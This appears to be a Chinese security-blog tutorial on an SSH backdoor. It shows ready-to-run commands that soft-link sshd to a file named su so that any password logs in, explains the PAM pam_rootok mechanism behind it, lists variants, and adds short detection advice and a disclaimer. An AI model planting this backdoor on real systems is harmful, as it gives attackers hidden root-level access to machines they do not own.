01 后門命令

經典后門：對sshd建立軟鏈接，即可使用任意密碼登錄。

1、創(chuàng)建后門ln -sf /usr/sbin/sshd /路徑名/su; /路徑名/su -oPort=端口號2、任意密碼登ssh 用戶名@x.x.x.x -p 端口號

02 原理

在sshd服務配置啟用PAM認證的前提下，PAM配置文件中控制標志為sufficient時，只要pam_rootok模塊檢測uid為0（root）即可成功認證登錄。

通俗點來說，一是sshd服務啟用PAM認證機制，在/etc/ssh/sshd_config文件中，設置UsePAM 為yes。如果不啟用PAM，系統(tǒng)嚴格驗證用戶密碼，不能建立后門。

二是在/etc/pam.d/目錄下，對應文件里包含"auth sufficient pam_rootok.so"配置，只要PAM配置文件中包含此配置即可SSH任意密碼登錄。

對比一下/etc/pam.d/sshd配置文件和/etc/pam.d/su配置文件，不難發(fā)現(xiàn)，前者沒有包含如上配置，而后者包含該配置。

直接啟動/usr/sbin/sshd,默認使用/etc/pam.d/sshd的pam配置文件，因而不能建立任意密碼登錄的后門。

而通過軟鏈接的方式，實質上PAM認證是通過軟鏈接的文件名（如：/tmp/su,/home/su），在/etc/pam.d/目錄下尋找對應的PAM配置文件(如：/etc/pam.d/su)。

sshd_config配置

PAM配置文件

03 利用

使用命令創(chuàng)建后門；通過前后對比，可以看到開啟了12345端口并處于監(jiān)聽狀態(tài)。

在cmder中連接ssh，輸入任意密碼，成功登錄。

軟鏈接的路徑不是絕對的，你可以任意設置，也可以使用除su以外的文件名，只要/etc/pam.d/目錄下能找到對應的文件，且該文件中包含"auth sufficient pam_rootok.so"配置即可。（不懂的再看看原理，不再贅述）

可以看到，在/etc/pam.d/目錄下，還有以上文件包含了該配置，這些文件名都可以用來創(chuàng)建后門。我們甚至還可以創(chuàng)建一個包含該配置的文件到/etc/pam.d/目錄下來創(chuàng)建后門。

當然，我們還可以使用其他用戶來登錄。

04 檢測防御

這類后門會開啟監(jiān)聽端口，我們可以先查看/etc/pam.d/目錄下有哪些文件包含該配置，然后通過管道符找到異常端口及進程，再通過進程找到異常文件，殺掉進程，不啟用PAM認證即可。

05 免責聲明

安全小白團是幫助用戶了解信息安全技術、安全漏洞相關信息的微信公眾號。安全小白團提供的程序(方法)可能帶有攻擊性，僅供安全研究與教學之用，用戶將其信息做其他用途，由用戶承擔全部法律及連帶責任，安全小白團不承擔任何法律及連帶責任。